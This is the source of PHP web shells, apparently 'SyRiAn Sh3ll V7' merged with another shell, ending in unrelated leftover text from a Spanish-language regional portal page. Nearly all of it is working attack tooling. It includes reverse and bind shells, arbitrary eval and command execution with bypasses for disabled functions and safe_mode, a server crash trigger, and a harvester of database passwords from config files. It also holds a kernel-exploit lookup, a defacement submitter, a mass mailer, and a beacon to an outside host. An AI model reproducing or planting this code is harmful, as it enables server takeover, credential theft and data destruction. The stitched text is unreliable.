if($_REQUEST['portbw']){ wbp($_REQUEST['portbw']); }if($_REQUEST['portbl']){ lbp($_REQUEST['portbl']); } if($_REQUEST['ipcb'] && $_REQUEST['portbc']){ bcn($_REQUEST['ipcb'],$_REQUEST['portbc']); } if($_REQUEST['do']=="bc"){ echo $head.$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Back Connect >>>>>>
Ip Address : Port :
".$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Windows Bind Port >>>>>>
Port :
".$formp."

Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )


<<<<<< Linux Bind Port >>>>>>
Port :
".$end;exit; } function copyf($file1,$file2,$filename){ global $slash; $fpc = fopen($file1, "rb"); $source = ''; while (!feof($fpc)) { $source .= fread($fpc, 8192); } fclose($fpc); $opt = fopen($file2.$slash.$filename, "w"); fwrite($opt, $source); fclose($opt); } if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){ if(is_writable($_REQUEST['cpyto'])){ echo $_REQUEST['address']; copyf($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST[' cpyto'],$_REQUEST['copyname']); }else{alert("Permission Denied !");}} if($_REQUEST['cfilename']){ echo $head.$formp.$nowaddress.'

Create File


'.$end;exit; } if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){ if($ofile4c=fopen($_REQUEST['nf4c'],"w")){ fwrite($ofile4c,$_REQUEST['nf4cs']); fclose($ofile4c); alert("File Saved !");}else{alert("Permission Denied !");}} function sqlclienT(){ global $t,$errorbox,$et,$hcwd; if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){ $server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUE ST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY']; $db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB']; $_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST[' typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUE ST['useR']; } if (isset ($_GET[select_db])){ $getdb=$_GET[select_db]; $_SESSION[db]=$getdb; $query="SHOW TABLES"; $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],$_SESSION[db],$query); } elseif (isset ($_GET[select_tbl])){ $tbl=$_GET[select_tbl]; $_SESSION[tbl]=$tbl; $query="SELECT * FROM `$tbl`"; $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],$_SESSION[db],$query); } elseif (isset ($_GET[drop_db])){ $getdb=$_GET[drop_db]; $_SESSION[db]=$getdb; $query="DROP DATABASE `$getdb`"; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESS ION[pass],'',$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],'','SHOW DATABASES'); } elseif (isset ($_GET[drop_tbl])){ $getbl=$_GET[drop_tbl]; $query="DROP TABLE `$getbl`"; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESS ION[pass],$_SESSION[db],$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],$_SESSION[db],'SHOW TABLES'); } elseif (isset ($_GET[drop_row])){ $getrow=$_GET[drop_row]; $getclm=$_GET[clm]; $query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'"; $tbl=$_SESSION[tbl]; querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESS ION[pass],$_SESSION[db],$query); $res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_ SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`"); } else $res=querY($type,$server,$user,$pass,$db,$query); if($res){ $res=htmlspecialchars($res); $row=array (); $title=explode('[+][+][+]',$res); $trow=explode('[-][-][-]',$title[1]); $row=explode('|+|+|+|+|+|',$title[0]); $data=array(); $field=$trow[count($trow)-2]; if (strstr($trow[0],'Database')!='') $obj='db'; elseif (substr($trow[0],0,6)=='Tables') $obj='tbl'; else $obj='row'; $i=0; foreach ($row as $a){ if($a!='') $data[$i++]=explode('|-|-|-|-|-|',$a); } echo "


'.$formg.'Change Directory
Upload --->  
'.$nowaddress.'
'.$ifupload.'
'.$formp.'Chmod ---->   File :
  Permission :
'.$formp.'Create Dir ----> Dirctory Name '.$nowaddress.'
'.$formp.'Create File ----> Name File '.$nowaddress.'
'.$formp.'Copy ---->   File : To Directory
"; foreach ($trow as $ti) echo ""; echo ""; $j=0; while ($data[$j]){ echo ""; foreach ($data[$j++] as $dr){ echo ""; } echo ""; } echo "
$ti
"; if($obj!='row') echo ""; echo $dr; if($obj!='row') echo ""; echo "Drop

"; } if(empty($_REQUEST['typE']))$_REQUEST['typE']=''; echo "

Connect to Database

DB Type:
Server Address:
Username:
Password:

Submit a Query

DB Name:
Query:
$hcwd
$et
"; } function querY($type,$host,$user,$pass,$db='',$query){ $res=''; switch($type){ case 'MySQL': if(!function_exists('mysql_connect'))return 0; $link=mysql_connect($host,$user,$pass); if($link){ if(!empty($db))mysql_select_db($db,$link); $result=mysql_query($query,$link); if ($result!=1){ while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|- |',$data).'|+|+|+|+|+|'; $res.='[+][+][+]'; for($i=0;$i
'; curl_close($ch); } if ($_REQUEST['bypcu']){ bypcu($_REQUEST['bypcu']); } if($_REQUEST['do']=="bypasscmd"){ if($_POST['bycw']){ echo $_POST['bycw']; $wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll'); $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw'].""); $stdout = $exec->StdOut(); $stcom = $stdout->ReadAll();} echo $head.'


Bypass Safe_Mode And Disable_Functions In Windows Server
'.$formp.'Command
Bypass Safe_Mode Windows Server
'.$formp.'Command
'.$end;exit;; } if($_REQUEST['do']=="bypassdir"){ if($_POST['byoc']){ if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){ $bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder"; }else{$bopens="Can Not Bypass This";} } if($_POST['byfc']){ curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__); $debfc=curl_exec($ch); } if($_POST['byetc']){ for($bye=0;$bye<40000;$bye++){ $sbep =$sbep. posix_getpwuid($bye); }} if($_POST['byfc9']){ echo "not sucsfull"; } if($_REQUEST['bysyml']){ $file=$_REQUEST['bysyml']; bywsym($file); } echo $head.'


Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2
'.$formp.'Address File

Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4
'.$formp.'Address File

Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9
'.$formp.'Address File

Bypass /Etc/Passwd
'.$formp.'
Bypass With ini_restore'.$formp.'
Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink
'.$formp.'

'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9
'.$formp.'
'.$end;exit;; } function printdrive(){ global $slash; foreach (range("A","Z") as $tempdrive) { if (is_dir($tempdrive.":".$slash)){ $adri=$tempdrive.":".$slash; $drivea=$drivea.''.$tempdrive.':'.$slash.' '; } } return $drivea; } if($_POST['nameren'] && $_POST['addressren']){ if(is_writable($_REQUEST['addressren'])){ rename($_POST['addressren'],$_POST['nameren']);alert("Rename Successful !"); }else{alert("Permission Denied !");} } if($_GET['do']=="delete"){ if ($_GET['type']=="dir"){ if(is_writable($_REQUEST['address'])){ $dir=$_GET['address'].$_GET['filename']; deleteDirectory($dir); alert("Deleted Successful !"); }else{alert("Permission Denied !");} }elseif($_GET['type']=="file"){ if(is_writable($_GET['address'].$_GET['filename'])){ unlink($_GET['address'].$_GET['filename']);alert("Deleted Successful !"); }else{alert("Permission Denied !");} } } if($_POST['fedit'] && $_POST['namefe']){ if(is_writable($_REQUEST['address'])){ $opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w"); fwrite($opensave,html_entity_decode($_POST['fedit'])); fclose($opensave);alert("File Saved Successful !"); }else{alert("Permission Denied !");} } if ($_POST['evalsource']){ eval($_POST['evalsource']); } if($_GET['do']=="eval"){ echo $head.$formp.$nowaddress.'


'.$end;exit; } if($_GET['do']=="info"){ if(ini_get('register_globals')){ $registerg="Enable"; }else{ $registerg="disable"; } if(extension_loaded('curl')){ $curls="Enable"; }else{ $curls="disable"; } if(@function_exists('mysql_connect')){ $db_on = "Mysql : On"; }; if(@function_exists('mssql_connect')){ $db_on = "Mssql : On"; }; if(@function_exists('pg_connect')){ $db_on = "PostgreSQL : On"; };if(@function_exists('ocilogon')){ $db_on = "Oracle : On"; }; echo $head."Operating System : ".php_uname()."
Server Name : ".$_SERVER['HTTP_HOST']."
Disable_Functions : ".$disablef."
Safe_Mode : ".$safe_modes."
Openbase_dir : ".ini_get('openbase_dir')."
Php Version : ".phpversion()."
Free Space : ".sizee(disk_free_space("/"))."
Total Space : ".sizee(disk_total_space("/"))."
Register_Globals : ".$registerg."
Curl : ".$curls."
Database ".$db_on."
Server Name : ".$_SERVER['HTTP_HOST']."
Admin Server : ".$_SERVER['SERVER_ADMIN'].$end; exit; } if ($_GET['do']=="cmd"){ echo $head.'

'.$end;exit;} if ($_GET['do']=="symlink"){ echo $head.'

SymLink With PHP
TO


SymLink With OS :
TO

'.$end;exit;} if ($_POST['ad1syp'] && $_POST['ad2syp']){ if (symlink($_POST['ad1syp'],$_POST['ad2syp'])){ alert("Symlink Worked !"); }else{ alert("Symlink Not Worked !"); }} if ($_POST['ad1syc'] && $_POST['ad2syc']){ if (system('ls -s '.$_POST['ad1syc']." ".$_POST['ad2syc'])){ alert("Symlink Worked !"); }else{alert("Symlink Not Worked !");} } if ($_GET['do']=="d0slocal"){ echo $head.'

If You Click This Link This Server Crashed.
This Worked In Php 5.3.x : Dos This Server I Am Sure
This Worked In Php 4.x.x And 5.2.9 : Dos This Server I Am Sure '.$end;exit;} if ($_GET['dosthisserver']=="1"){ function dosserver(){ $junk=str_repeat("9999999999999999999999999999999999999999999 9999999",99999); for($i=0;$i<2;){ $buff=bcpow($junk, '3', 2); $buff=null; } } dosserver(); } if ($_GET['dosthisserver']=="2"){ function cx(){cx();} cx(); } if ($_GET['do']=="convert"){ $hash=null; if ($_GET['stringtoh'] && $_GET['hashtoh']=='md5'){ $hash=md5($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='sh1'){ $hash=sha1($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='crc32'){ $hash=crc32($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64e'){ $hash=base64_encode($_GET['stringtoh']); }elseif ($_GET['stringtoh'] && $_GET['hashtoh']=='b64d'){ $hash=base64_decode($_GET['stringtoh']); } echo $head.'

Convert

'.$end;exit;} if ($_GET['do']=="dump"){ echo $head.'

'; echo '

Backup Database

DB Type:
Server:
Username:
Password:
Data Base Name:

'.$end;exit;} if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){ $date = date("Y-m-d"); $dbserver = $_POST['server']; $dbuser = $_POST['username']; $dbpass = $_POST['password']; $dbname = $_POST['dbname']; $file = "Dump-$dbname-$date"; $method = $_POST['method']; if ($method=='sql'){ $file="Dump-$dbname-$date.sql"; $fp=fopen($file,"w"); }else{ $file="Dump-$dbname-$date.sql.gz"; $fp = gzopen($file,"w"); } function write($data) { global $fp; if ($_POST['method']=='sql'){ fwrite($fp,$data); }else{ gzwrite($fp, $data); }} mysql_connect ($dbserver, $dbuser, $dbpass); mysql_select_db($dbname); $tables = mysql_query ("SHOW TABLES"); while ($i = mysql_fetch_array($tables)) { $i = $i['Tables_in_'.$dbname]; $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i)); write($create['Create Table'].";\n\n"); $sql = mysql_query ("SELECT * FROM ".$i); if (mysql_num_rows($sql)) { while ($row = mysql_fetch_row($sql)) { foreach ($row as $j => $k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");\n"); } } } if ($method=='sql'){ fclose ($fp); }else{ gzclose($fp);} header("Content-Disposition: attachment; filename=" . $file); header("Content-Type: application/download"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } if ($_GET['do']=="mail"){ echo $head.'

Address :

Subject :



Number For Send :

'.$end;exit;} if ($_POST['admail'] && $_POST['submail'] ){ for($mi=0;$miChmod
To
".$end;exit; } /* if($_GET['do']=="edit"){ if($_GET['filename']=="dir"){ if(is_readable($_GET['address'])){ chdir($_GET['address']);}else{alert("Permission Denied !");} }} */ $araddresss=explode($slash,getcwd()); $matharrayy=count($araddresss)-1; $addr1backk=str_replace($araddresss[$matharrayy],"",$araddresss); for($countback=0;$countback=1){ $rr=str_replace($basep,"",getcwd()); $rr=str_replace("\\","/",$rr); $diropen=''.$parsef.''; }else{ $diropen=''.$parsef.''; } return $diropen; } if ($_GET['address']){$ifget=$_GET['address'];}if($_POST['address']) {$ifget=$_POST['address'];} if($cwd==''){$cwd=getcwd();}$nowaddress=''; $ad=getcwd(); $hand=opendir("$ad"); $coi=0; $coi2=0; while (false !== ($fileee = readdir($hand))) { if ($fileee != "." && $fileee != "..") { if (filetype($fileee)=="dir"){ if ($coi %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"'; } $coi++; $fil=$fil.'

'.$fileee.'

'.date("y/m/d", filectime($fileee)).''.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'DL Ren Del
' ;} else{ if ($coi2 %2){ $colort='"#e7e3de"'; }else{ $colort='"#e4e1de"'; } $coi2++; $file=$file.'

'.openf($fileee).'

'.sizee(filesize($fileee)).''.date("y/m/d", filectime($fileee)).''.substr(sprintf('%o', fileperms($cwd.$slash."$fileee")), -3).'EditDL Ren Del
' ;} } } echo $head.'

Now Directory : '.getcwd()."
".printdrive().'
Back

'.$fil.$file.'

'.$formg.'Command Execute :

'.$formg.'Change Dir :

'.$formg.'Create Dir :

'.$formg.'Create File :

'.$for - lol lol

"; } if($_GET['id'] == 'Delete') { Suicide(); } # ---------------------------------------# # Functions # #----------------------------------------# function input($type,$name,$value,$size) { if (empty($value)) { print ""; } elseif(empty($name)&&empty($size)) { print ""; } elseif(empty($size)) { print ""; } else { print ""; } } function read_dir($path,$username) { if ($handle = opendir($path)) { while (false !== ($file = readdir($handle))) { $fpath="$path$file"; if (($file!='.') and ($file!='..')) { if (is_readable($fpath)) { $dr="$fpath/"; if (is_dir($dr)) { read_dir($dr,$username); } else { if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { $pass=get_pass($fpath); if ($pass!='') { echo "[+] $fpath\n$pass\n"; ftp_check($username,$pass); } } } } } } } } function get_pass($link) { @$config=fopen($link,'r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { if (strrpos($line,'"')) $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')- (strpos($line,'=')+3))); else $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")- (strpos($line,'=')+3))); return $pass; } } } function GetRealIP() { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $urls= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; curl_setopt($ch, CURLOPT_URL, 'http://bugreport.serveblog.net/storage.php'); curl_setopt($ch, CURLOPT_REFERER, $urls); $html = curl_exec($ch); if (getenv(HTTP_X_FORWARDED_FOR)) { $ip=getenv(HTTP_X_FORWARDED_FOR); } elseif (getenv(HTTP_CLIENT_IP)) { $ip=getenv(HTTP_CLIENT_IP); } else { $ip=getenv(REMOTE_ADDR); } return $ip; } function openBaseDir() { $openBaseDir = ini_get("open_basedir"); if (!$openBaseDir) { $openBaseDir = 'OFF'; } else { $openBaseDir = 'ON'; } return $openBaseDir; } function str_hex($string) { $hex=''; for ($i=0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } return $hex; } function SafeMode() { $safe_mode = ini_get("safe_mode"); if (!$safe_mode) { $safe_mode = 'OFF'; } else { $safe_mode = 'ON'; } return $safe_mode; } function currentFileName() { $currentFileName = $_SERVER["SCRIPT_NAME"]; $currentFileName = Explode('/', $currentFileName); $currentFileName = $currentFileName[count($currentFileName) - 1]; return $currentFileName; } function Suicide() { @unlink(currentFileName()); } function rootxpL() { $v=@php_uname(); $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace- kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace'); foreach($db as $k=>$x)if(strstr($v,$k))return $x; if(!$xpl)$xpl='Not found.'; return $xpl; } function PostgreSQL() { if(@function_exists('pg_connect')) { $postgreSQL = 'ON'; } else { $postgreSQL = 'OFF'; } return $postgreSQL; } function Oracle() { if(@function_exists('ocilogon')) { $oracle = 'ON'; } else { $oracle = 'OFF'; } return $oracle; } function ZoneH($url, $hacker, $hackmode,$reson, $site ) { $k = curl_init(); curl_setopt($k, CURLOPT_URL, $url); curl_setopt($k,CURLOPT_POST,true); curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson); curl_setopt($k,CURLOPT_FOLLOWLOCATION, true); curl_setopt($k, CURLOPT_RETURNTRANSFER, true); $kubra = curl_exec($k); curl_close($k); return $kubra; } function MsSQL() { if(@function_exists('mssql_connect')) { $msSQL = 'ON'; } else { $msSQL = 'OFF'; } return $msSQL; } function MySQL2() { $mysql_try = function_exists('mysql_connect'); if($mysql_try) { $mysql = 'ON'; } else { $mysql = 'OFF'; } return $mysql; } function Gzip() { if (function_exists('gzencode')) { $gzip = 'ON'; } else { $gzip = 'OFF'; } return $gzip; } function MysqlI() { if (function_exists('mysqli_connect')) { $mysqli = 'ON'; } else { $mysqli = 'OFF'; } return $mysqli; } function MSQL() { if (function_exists('msql_connect')) { $mSql = 'ON'; } else { $mSql = 'OFF'; } return $mSql; } function SQlLite() { if (function_exists('sqlite_open')) { $SQlLite = 'ON'; } else { $SQlLite = 'OFF'; } return $SQlLite; } function tulis($file,$text) { $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function RegisterGlobals() { if(ini_get('register_globals')) { $registerg= 'ON'; } else { $registerg= 'OFF'; } return $registerg; } function HardSize($size) { if($size >= 1073741824) { $size = @round($size / 1073741824 * 100) / 100 . " GB"; } elseif($size >= 1048576) { $size = @round($size / 1048576 * 100) / 100 . " MB"; } elseif($size >= 1024) { $size = @round($size / 1024 * 100) / 100 . " KB"; } else { $size = $size . " B"; } return $size; } function Curl() { if(extension_loaded('curl')) { $curl = 'ON'; } else { $curl = 'OFF'; } return $curl; } function DecryptConfig() { @include("DecryptConfig.php"); if($_POST['ScriptType'] == 'vb') { $dbName = $config['Database']['dbname']; $prefix = $config['Database']['tableprefix']; $email = $config['Database']['technicalemail']; $host = $config['MasterServer']['servername']; $port = $config['MasterServer']['port']; $user = $config['MasterServer']['username']; $pass = $config['MasterServer']['password']; $admincp = $config['Misc']['admincpdir']; $modecp = $config['Misc']['modcpdir']; } elseif($_POST['ScriptType'] == 'wp') { $dbName = DB_NAME; $prefix = $table_prefix; $host = DB_HOST; $user = DB_USER; $pass = DB_PASS; } elseif($_POST['ScriptType'] == 'jos') { $dbName = $db; $prefix = $dbprefix; $email = $mailfrom; $host = $host; $user = $user; $pass = $password; } elseif($_POST['ScriptType'] == 'phpbb') { $host = $dbhost; $port = $dbport; $dbName = $dbname; $user = $dbuser; $pass = $dbpasswd; $prefix = $table_prefix; } elseif($_POST['ScriptType'] == 'ipb') { $host = $INFO['sql_host']; $dbName = $INFO['sql_database']; $user = $INFO['sql_user']; $pass = $INFO['sql_pass']; $prefix = $INFO['sql_tbl_prefix']; } elseif($_POST['ScriptType'] == 'smf') { $dbName = $db_name; $pass = $db_passwd; $prefix = $db_prefix; $host = $db_server; $user = $db_user; $email = $webmaster_email; } elseif($_POST['ScriptType'] == 'mybb') { $host = $config['database']['hostname']; $user = $config['database']['username']; $pass = $config['database']['password']; $dbName = $config['database']['database']; $prefix = $config['database']['table_prefix']; $admincp = $config['admin_dir']; $prefix = $config['database']['table_prefix']; } echo ' #-------------------------------# # Config Informations # #-------------------------------# Host : '.$host.' DB Name : '.$dbName.' DB User : '.$user.' DB Pass : '.$pass.' Prefix : '.$prefix.' Email : '.$email.' Port : '.$port.' ACP : '.$admincp.' MCP : '.$modecp.' '; } function footer() { echo '
[TOP ]
v7 Features;
'; } function whereistmP() { $uploadtmp=ini_get('upload_tmp_dir'); $uf=getenv('USERPROFILE'); $af=getenv('ALLUSERSPROFILE'); $se=ini_get('session.save_path'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uf) && is_writable($uf))return $uf; if(is_dir($af) && is_writable($af))return $af; if(is_dir($se) && is_writable($se))return $se; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return '.'; } function winshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); win_shell_execute('cmd.exe','',"/C $command >\"$name\""); sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function update() { echo "[+] Update Has D0n3 ^_^"; } function srvshelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd= (empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVE R['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'p arams'=>"/c $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function ffishelL($command) { $name=whereistmP()."\\".uniqid('NJ'); $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); unlink($name); return $exec; } function comshelL($command,$ws) { $exec=$ws->exec("cmd.exe /c $command"); $so=$exec->StdOut(); return $so->ReadAll(); } function perlshelL($command) { $perl=new perl(); ob_start(); $perl->eval("system(\"$command\")"); $exec=ob_get_contents(); ob_end_clean(); return $exec; } function Exe($command) { global $windows; $exec=$output=''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(function_exists('passthru')) {ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_e nd_clean();} elseif(function_exists('system')) {$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_c ontents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')) {@exec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exists('shell_exec'))$exec=@shell_exec($command); elseif(function_exists('popen')) {$output=@popen($command,'r');while(!feof($output)) {$exec=fgets($output);}pclose($output);} elseif(function_exists('proc_open')) {$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])) {$line=fgets($pipes[1]);$output.=$line;}$exec= $output;proc_close($res);} elseif(function_exists('win_shell_execute'))$exec=winshelL($command); elseif(function_exists('win32_create_service'))$exec=srvshelL($comman d); elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command); elseif(extension_loaded('perl'))$exec=perlshelL($command); return $exec; } function magicQouts() { $mag=get_magic_quotes_gpc(); if (empty($mag)) { $mag = 'OFF'; } else { $mag= 'ON'; } return $mag; } function DisableFunctions() { $disfun = ini_get('disable_functions'); if (empty($disfun)) { $disfun = 'NONE'; } return $disfun; } function SelectCommand($os) { if($os == 'Windows') { echo " "; } else { echo " "; } } function GenerateFile($name,$content) { $file = @fopen($name,"w+"); @fwrite($file,$content); @fclose($file); return true; } function which($pr) { $path = Exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function checkfunctioN($func) { global $disablefunctions,$safemode; $safe=array('passthru','system','exec','exec','shell_exec','popen','proc_op en'); if($safemode=='ON' && in_array($func,$safe))return 0; elseif(function_exists($func) && is_callable($func) && !strstr($disablefunctions,$func))return 1; return 0; } function CSS($shellColor) { $css = " SyRiAn Sh3ll ~ V7~ [ B3 Cr34T!V3 Or D!3 TRy!nG ] "; if($_GET['id'] == '') { $css .= ""; } return $css; } function Logout() { print""; } function About() { $about = "

Coded By : EH << SyRiAn | 34G13
From : SyRiAn Arabic Republic
Age : 4/1991
Thanx : [ Allah ] [ HaniWT ] [ SyRiAn_SnIpEr ] [ SyRiAn_SpIdEr ] [ TNT Hacker ]
Thanx : my school : [ www.google.com ] :)

B3 Cr34T!V3 0R D!3 TRy!nG




"; return $about; } echo CSS($shellColor); # ---------------------------------------# # Authentication # #----------------------------------------# if ($uselogin ==1) { if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) { if($_POST[usrname]==$user && $_POST[passwrd]==$pass) { print''; } else { if($_POST['usrname']) { print''; } echo '

SyRi An Sh 3ll


'; exit; } } } # ---------------------------------------# # Some Info # #----------------------------------------# $dir = getcwd(); $uname= @php_uname(); if(strlen($dir)>1 && $dir[1]==":") $os = "Windows"; else $os = "Linux"; $serverIP = gethostbyname($_SERVER["HTTP_HOST"]); $server = @substr($SERVER_SOFTWARE,0,120); echo "

  

 
SyRiAn Sh3ll
V7

  [Main] [Forum Defacer] [Email Spammer] [About] [Logout] [SuiCide]

  Safe Mode = ".@SafeMode()."   System = ".$os."   Magic_Quotes = ". @magicQouts()."   Curl = ".@Curl()."   Register Globals = ".@RegisterGlobals()."   Open Basedir = ".@openBaseDir()."
  Gzip = ".@Gzip()."   MySQLI = ".@MysqlI()."   MSQL = ".@MSQL()."   SQL Lite = ".@SQlLite()."   Usefull Locals = ".rootxpL()."
  Free Space = ".@HardSize(disk_free_space('/'))."   Total Space = ".@HardSize(disk_total_space("/"))."   PHP Version = ".@phpversion()."   Zend Version = ".@zend_version()."   MySQL Version = ".@mysql_get_server_info()."
  MySQL = ".MySQL2()."   MsSQL = ".MsSQL()."   PostgreSQL = ".PostgreSQL()."   Oracle = ".Oracle()."   Server Name = ".$_SERVER['HTTP_HOST']."   Server Admin = ".$_SERVER['SERVER_ADMIN']."
  Dis_Functions = ". DisableFunctions()."
  Your IP = ".GetRealIP()."   Server IP = ".gethostbyname($_SERVER["HTTP_HOST"])." [Reverse IP]   Date Time = ".date('Y-m-d H:i:s')."
  [MD5 Cracker] [SHA1 Cracker] [NTLM Cracker]

  Server :  
uname -a :  
pwd :  
ID :  

  ".$server."
  ".$uname." [Google]
  ". $dir."
  ".Exe('id')."

  [Down] [Print]

"; # ---------------------------------------# # Main Page # #----------------------------------------# if ($_GET['id']== 'mainPage') { echo "
"; if($_POST['editFileSubmit']) { echo " "; echo ""; } echo "
  Commands Alias
";SelectCommand($os); echo "
  Command Line
  Edit File
  Change Mode

  Get File
  Bind Connection
  CGI Perl
lol lol

 

 

Documento sin título
INICIO SESION USUARIO
Nick:
  
Clave:
  
BUSCAR
Busca en Portal Choapa con Google

ENCUESTA

¿Cuál es el mayor atractivo cultural del Valle del Choapa?

1.Petroglifos
2.Río Choapa
3.Raja de Manquehue
4.Reserva Nacional de Chinchillas

Mini-Chat
Documento sin título